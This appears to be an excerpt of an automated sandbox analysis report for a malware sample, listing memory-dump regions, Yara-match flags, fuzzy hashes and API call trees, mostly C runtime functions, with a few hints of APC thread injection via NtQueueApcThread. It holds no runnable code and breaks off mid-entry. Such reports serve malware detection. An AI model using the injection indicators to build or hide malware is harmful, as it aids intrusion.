                                                                  • free.LIBCMT ref: 0354371F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 2761444284-0
                                                                  • Opcode ID: 01a976f15273147b50ec7d6acdbedb3c21a43aceee13bf4a7ef4d6a722d450b4
                                                                  • Instruction ID: 5c0a1282710517c809010f31cdc59b93e66b63431190cebaad55536409fc3b68
                                                                  • Opcode Fuzzy Hash: 01a976f15273147b50ec7d6acdbedb3c21a43aceee13bf4a7ef4d6a722d450b4
                                                                  • Instruction Fuzzy Hash: EC41C438618F0B4FD75EEB6CA45157A73D4FB89304B40026DD88BC3226FF24E86686C5
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009941BD
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • malloc.LIBCMT ref: 009941C8
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB2BC
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2C1
                                                                  • free.LIBCMT ref: 009942AF
                                                                  • free.LIBCMT ref: 009942B7
                                                                  • free.LIBCMT ref: 009942BF
                                                                  • free.LIBCMT ref: 009942CB
                                                                  • free.LIBCMT ref: 009942D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 996410232-0
                                                                  • Opcode ID: d822beeafb31d47687cbbf35900d7bfd8460a788cd57ec4d81b27c9478e24994
                                                                  • Instruction ID: a9c115ccd0e1be71477e64d3d504b0ec08ad5784b7cd23f596dfd041f3c24a1c
                                                                  • Opcode Fuzzy Hash: d822beeafb31d47687cbbf35900d7bfd8460a788cd57ec4d81b27c9478e24994
                                                                  • Instruction Fuzzy Hash: D44137223047928BDF1ADB6AE950B6E2754F74ABC4F804525EF6A4B716DF38D823C700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: htonl$freemalloc
                                                                  • String ID: zyxwvutsrqponmlk
                                                                  • API String ID: 1249573706-3884694604
                                                                  • Opcode ID: 60e827709e15f071cf2e6c3d2d1b9052fe80b1463481f4d5e0851a6ab7a4111b
                                                                  • Instruction ID: 327484793c1fc5fa5ec397f63ce080f97706cf6054b575f91b683f279f9b0e37
                                                                  • Opcode Fuzzy Hash: 60e827709e15f071cf2e6c3d2d1b9052fe80b1463481f4d5e0851a6ab7a4111b
                                                                  • Instruction Fuzzy Hash: AC21072230174442EF14EF7AA95136E6BD5EBDABD4F044439AE5A87B57EF3CC8468340
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: signal
                                                                  • String ID: CCG
                                                                  • API String ID: 1946981877-1584390748
                                                                  • Opcode ID: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
                                                                  • Instruction ID: 8a37928041284c8a434aeccdd4db6f983c568c8f0cf3e4f2934023fa32f313ab
                                                                  • Opcode Fuzzy Hash: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
                                                                  • Instruction Fuzzy Hash: C321A171B0154146EE296279865D33B10019B9A374F284E379A3DA73E0DEFECCC2830E
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcResumeThread
                                                                  • String ID: NtQueueApcThread$ntdll
                                                                  • API String ID: 682313787-1374908105
                                                                  • Opcode ID: e7e6c475633100eece6753356ed918a7e6f8eaece10a8f42ca503db20b9cac72
                                                                  • Instruction ID: c9083cdda2e8153679a90e63f1ad3b3c0964f2a54dbea64e847755a8f4427423
                                                                  • Opcode Fuzzy Hash: e7e6c475633100eece6753356ed918a7e6f8eaece10a8f42ca503db20b9cac72
                                                                  • Instruction Fuzzy Hash: 6B01A221704B8182EB008B5AF990399B3A4F789BE0F984531EF6947B65DF38C4518700
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009A1276
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • _snprintf.LIBCMT ref: 009A1295
                                                                    • Part of subcall function 009AB5DC: _errno.LIBCMT ref: 009AB613
                                                                    • Part of subcall function 009AB5DC: _invalid_parameter_noinfo.LIBCMT ref: 009AB61E
                                                                  • remove.LIBCMT ref: 009A12A1
                                                                  • remove.LIBCMT ref: 009A12A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                                                  • String ID: %s\%s
                                                                  • API String ID: 1896346573-4073750446
                                                                  • Opcode ID: ffc5b049335742fc71228dd6e777388c78786af3e347fc27d6e655662866bbaa
                                                                  • Instruction ID: 1bc876bdf174efb02393a7dc203a30beeef7094a0b798cab8557b0419ff11220
                                                                  • Opcode Fuzzy Hash: ffc5b049335742fc71228dd6e777388c78786af3e347fc27d6e655662866bbaa
                                                                  • Instruction Fuzzy Hash: 07F05E21A09B9085D600AB52B8113AEA764E7C6BD0F684621FF9957B1ACF3CC55187C4
                                                                  APIs
                                                                    • Part of subcall function 03553B67: malloc.LIBCMT ref: 03553B83
                                                                  • malloc.LIBCMT ref: 0354BF65
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                    • Part of subcall function 0355A047: malloc.LIBCMT ref: 0355A097
                                                                    • Part of subcall function 0355A047: realloc.LIBCMT ref: 0355A0A6
                                                                  • malloc.LIBCMT ref: 0354C057
                                                                  • _snprintf.LIBCMT ref: 0354C0D5
                                                                  • _snprintf.LIBCMT ref: 0354C0FD
                                                                  • _snprintf.LIBCMT ref: 0354C124
                                                                  • free.LIBCMT ref: 0354C292
                                                                    • Part of subcall function 035586F3: malloc.LIBCMT ref: 03558727
                                                                    • Part of subcall function 035586F3: free.LIBCMT ref: 035588DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
                                                                  • String ID:
                                                                  • API String ID: 2667508507-0
                                                                  • Opcode ID: 479da97b01b779146c38a62a3070aff10b568b1b266dc2a7db8f21ac3f222f97
                                                                  • Instruction ID: e6700915baf5bdd304c4d27521335cd3ab1ccbcbfc891a5974561e9808332d5d
                                                                  • Opcode Fuzzy Hash: 479da97b01b779146c38a62a3070aff10b568b1b266dc2a7db8f21ac3f222f97
                                                                  • Instruction Fuzzy Hash: 23A1A3347187054BDB18FB74B8A567D72F6FBD9210F44452EAC4ACB2B1EE38E9058782
                                                                  APIs
                                                                    • Part of subcall function 03553B67: malloc.LIBCMT ref: 03553B83
                                                                    • Part of subcall function 0355BA07: _errno.LIBCMT ref: 0355B95E
                                                                    • Part of subcall function 0355BA07: _invalid_parameter_noinfo.LIBCMT ref: 0355B969
                                                                  • fseek.LIBCMT ref: 0354FE1B
                                                                    • Part of subcall function 0355C28B: _errno.LIBCMT ref: 0355C2B3
                                                                    • Part of subcall function 0355C28B: _invalid_parameter_noinfo.LIBCMT ref: 0355C2BE
                                                                  • _ftelli64.LIBCMT ref: 0354FE23
                                                                    • Part of subcall function 0355C2FF: _errno.LIBCMT ref: 0355C31D
                                                                    • Part of subcall function 0355C2FF: _invalid_parameter_noinfo.LIBCMT ref: 0355C328
                                                                  • fseek.LIBCMT ref: 0354FE33
                                                                    • Part of subcall function 0355C28B: _fseek_nolock.LIBCMT ref: 0355C2DC
                                                                  • malloc.LIBCMT ref: 0354FE73
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • fclose.LIBCMT ref: 0354FF30
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
                                                                  • String ID:
                                                                  • API String ID: 2887643383-0
                                                                  • Opcode ID: 7b4d7289a34a9255c824d7eaa77b2ff1df567971f9fd99a7ac6ed81b33217d28
                                                                  • Instruction ID: bc90997f5803adebf97e72d4bb69f2a3d37aeb350eaf213d45a2ffe2ef098cf3
                                                                  • Opcode Fuzzy Hash: 7b4d7289a34a9255c824d7eaa77b2ff1df567971f9fd99a7ac6ed81b33217d28
                                                                  • Instruction Fuzzy Hash: 7A51A535718B084FC74DEB2CB45567973E5FBD9304B40466EE48BC72A5EE34A90287C6
                                                                  APIs
                                                                  • _mtinitlocknum.LIBCMT ref: 03565568
                                                                    • Part of subcall function 0355F03F: _FF_MSGBANNER.LIBCMT ref: 0355F05C
                                                                    • Part of subcall function 0355F03F: _NMSG_WRITE.LIBCMT ref: 0355F066
                                                                  • _lock.LIBCMT ref: 0356557B
                                                                  • _lock.LIBCMT ref: 035655D6
                                                                  • _calloc_crt.LIBCMT ref: 0356568D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _lock$_calloc_crt_mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 3962633935-0
                                                                  • Opcode ID: 3f7d7383109a2b023e6d9ae3b720316474c0133ef7fa5bdb011a38a708de0ad6
                                                                  • Instruction ID: ff454658f5f5fe93ed4bbc2ffd01c34688428b6e41066f7f0d78eb2dc88feb5f
                                                                  • Opcode Fuzzy Hash: 3f7d7383109a2b023e6d9ae3b720316474c0133ef7fa5bdb011a38a708de0ad6
                                                                  • Instruction Fuzzy Hash: C751F670558B098FD718DF18E895265B7E4FB99310F150A9EE88BC7271EB34E942CBC2
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 03544981
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • malloc.LIBCMT ref: 0354498C
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A703
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A708
                                                                  • free.LIBCMT ref: 03544A73
                                                                  • free.LIBCMT ref: 03544A7B
                                                                  • free.LIBCMT ref: 03544A87
                                                                  • free.LIBCMT ref: 03544A94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 2761444284-0
                                                                  • Opcode ID: ddbb960c4c1ee8468c6250dc08bf5515ef5a4ba7345911af3a06a17fc36967dd
                                                                  • Instruction ID: 45cd164caa81ada7534d1412b0e0fd97d93be906a21f5a2cdc87452d9a4b7a43
                                                                  • Opcode Fuzzy Hash: ddbb960c4c1ee8468c6250dc08bf5515ef5a4ba7345911af3a06a17fc36967dd
                                                                  • Instruction Fuzzy Hash: 9A41F57561CB0E4BD72DEA6A684663B72DAFBD6254714026ED887C3222EE20D80787C5
                                                                  APIs
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0355BF3E
                                                                  • memcpy_s.LIBCMT ref: 0355C003
                                                                  • _fileno.LIBCMT ref: 0355C06E
                                                                    • Part of subcall function 03560C3B: _errno.LIBCMT ref: 03560C44
                                                                    • Part of subcall function 03560C3B: _invalid_parameter_noinfo.LIBCMT ref: 03560C4F
                                                                    • Part of subcall function 0356211F: __doserrno.LIBCMT ref: 03562159
                                                                    • Part of subcall function 0356211F: _errno.LIBCMT ref: 03562160
                                                                  • _filbuf.LIBCMT ref: 0355C09C
                                                                  • _errno.LIBCMT ref: 0355C0EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_invalid_parameter_noinfo$__doserrno_filbuf_filenomemcpy_s
                                                                  • String ID:
                                                                  • API String ID: 1812282339-0
                                                                  • Opcode ID: 8b1461345f166dcaacafda40ee5fb0560b219fd4bf31384df6ca32e7d4f873f7
                                                                  • Instruction ID: 5d750fb2f1ae04abe1bbce01d8645831f0a309128be2f47c7c98dc05aea1cf4f
                                                                  • Opcode Fuzzy Hash: 8b1461345f166dcaacafda40ee5fb0560b219fd4bf31384df6ca32e7d4f873f7
                                                                  • Instruction Fuzzy Hash: 5A41943636CB054B962CD62C6469139B2D1F7D5721718072FE89AC32B1DE60F85286C6
                                                                  APIs
                                                                  • _fileno.LIBCMT ref: 0355D4F8
                                                                    • Part of subcall function 03560C3B: _errno.LIBCMT ref: 03560C44
                                                                    • Part of subcall function 03560C3B: _invalid_parameter_noinfo.LIBCMT ref: 03560C4F
                                                                  • _errno.LIBCMT ref: 0355D508
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • _errno.LIBCMT ref: 0355D524
                                                                  • _isatty.LIBCMT ref: 0355D585
                                                                  • _getbuf.LIBCMT ref: 0355D591
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
                                                                  • String ID:
                                                                  • API String ID: 304646821-0
                                                                  • Opcode ID: a7a29ed1146a2838a1a953b545c0c20c3df8c09792cabfb42726ced0f4b7ec54
                                                                  • Instruction ID: 12ea584ec754801970c8220f137ccd6f3ff7f910967738d0a4d2c109ccc50dbb
                                                                  • Opcode Fuzzy Hash: a7a29ed1146a2838a1a953b545c0c20c3df8c09792cabfb42726ced0f4b7ec54
                                                                  • Instruction Fuzzy Hash: C341C371114B094FDB58EF6CE4E162577F0FB88314F58069AEC5ACB2A6E674E881C7C1
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 03556C12
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • _snprintf.LIBCMT ref: 03556C2A
                                                                    • Part of subcall function 0355AA23: _errno.LIBCMT ref: 0355AA5A
                                                                    • Part of subcall function 0355AA23: _invalid_parameter_noinfo.LIBCMT ref: 0355AA65
                                                                  • free.LIBCMT ref: 03556C41
                                                                    • Part of subcall function 0355A62F: _errno.LIBCMT ref: 0355A64F
                                                                  • malloc.LIBCMT ref: 03556C91
                                                                  • _snprintf.LIBCMT ref: 03556CA9
                                                                  • free.LIBCMT ref: 03556CD1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 761449704-0
                                                                  • Opcode ID: 7769da5689e5036543463322d8dc2953687d35e842421fa7a79a909f037a7b7e
                                                                  • Instruction ID: b7058eee65ef5992ecc5daa99e0bd70fd8ce7dab66ff7b464e69fd15658776d5
                                                                  • Opcode Fuzzy Hash: 7769da5689e5036543463322d8dc2953687d35e842421fa7a79a909f037a7b7e
                                                                  • Instruction Fuzzy Hash: 6731862071CA8D0FD769EB6C782527477E2F789310784569FE48EC3266EE24EC5287C5
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 1640621425-0
                                                                  • Opcode ID: f89985f424ce9c22c43889eabc5058f2aa413770285343a9214468ff08af004a
                                                                  • Instruction ID: 79faf5b4c66204adae0e0b3514c6f4fac557a2357577a1875704a8ce8ba80ad4
                                                                  • Opcode Fuzzy Hash: f89985f424ce9c22c43889eabc5058f2aa413770285343a9214468ff08af004a
                                                                  • Instruction Fuzzy Hash: 033168B130078586DE28DE27964022EB655FB46FE0F189630DF664FB81EB7CC88187C0
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0099553A
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • malloc.LIBCMT ref: 00995545
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB2BC
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2C1
                                                                  • free.LIBCMT ref: 0099562C
                                                                  • free.LIBCMT ref: 00995634
                                                                  • free.LIBCMT ref: 00995640
                                                                  • free.LIBCMT ref: 0099564D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 996410232-0
                                                                  • Opcode ID: ad7a18b5cb1adff7d6ed1ba8d34c42f9090e139c4094cc48844a1b376a1b96a1
                                                                  • Instruction ID: 28aec28d9750f9c93480a0ec88d2e7cc2255e60442756d1ea42146bbbf172913
                                                                  • Opcode Fuzzy Hash: ad7a18b5cb1adff7d6ed1ba8d34c42f9090e139c4094cc48844a1b376a1b96a1
                                                                  • Instruction Fuzzy Hash: 9E312B22304B8546DF16EF2EA81472F6B59F7A6BC8F8A4021DD458B716EF38C947C300
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 2998201375-0
                                                                  • Opcode ID: acbc039f2ec1fa7f9a161c65c4e844387fcccdc5e67f3ee5a67b1b2bba6280d5
                                                                  • Instruction ID: c71268395cd3163f8a6f23afcb41e6d3105231877ac409bbcc2f3c1652938c1c
                                                                  • Opcode Fuzzy Hash: acbc039f2ec1fa7f9a161c65c4e844387fcccdc5e67f3ee5a67b1b2bba6280d5
                                                                  • Instruction Fuzzy Hash: A331A93231978086DB20CF15E6807A9BBB9F785FE4F188126EB8997B55DB3CD851CB00
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0354EC78
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • free.LIBCMT ref: 0354ECB3
                                                                  • fwrite.LIBCMT ref: 0354ECF4
                                                                  • fclose.LIBCMT ref: 0354ECFC
                                                                  • free.LIBCMT ref: 0354ED09
                                                                    • Part of subcall function 0355A62F: _errno.LIBCMT ref: 0355A64F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$free$_callnewhfclosefwritemalloc
                                                                  • String ID:
